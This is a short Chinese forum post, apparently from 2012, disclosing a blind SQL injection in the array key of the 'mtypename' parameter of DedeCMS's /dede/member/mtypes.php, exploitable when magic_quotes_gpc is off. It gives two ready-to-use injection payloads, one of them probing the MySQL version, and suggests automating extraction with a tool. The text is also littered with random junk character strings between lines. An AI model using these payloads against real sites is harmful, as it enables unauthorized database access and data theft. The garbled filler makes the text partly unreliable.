需要magic_quotes_gpc = Off,所以说是鸡肋啊.
% u2 J) B5 f* x" [0 @) y/ h
; `0 _, T% X7 T8 \ # b, S- V1 l7 C
发生在数组key里的注射漏洞,有点意思.
+ }7 O N& u" X6 H3 F1 P 8 z9 D) H% z3 f/ [2 R5 J
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
( n; N Z" `& T& I/ m3 M
* i6 {' {: ~! F o6 X) v5 _7 Chttp://www.xxx.com /dede/member/mtypes.php?dopost=save/ {6 m" C4 C6 G- ]5 Q/ L. x
7 j) |, d: k, l5 \9 Sexploit:
% A( @# \+ l H2 a5 Omtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
: P" Z- b* m: g- qmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r, x) i. O# c Z3 s- W
|
发表于 2012-12-20 08:08:09
收藏
支持
反对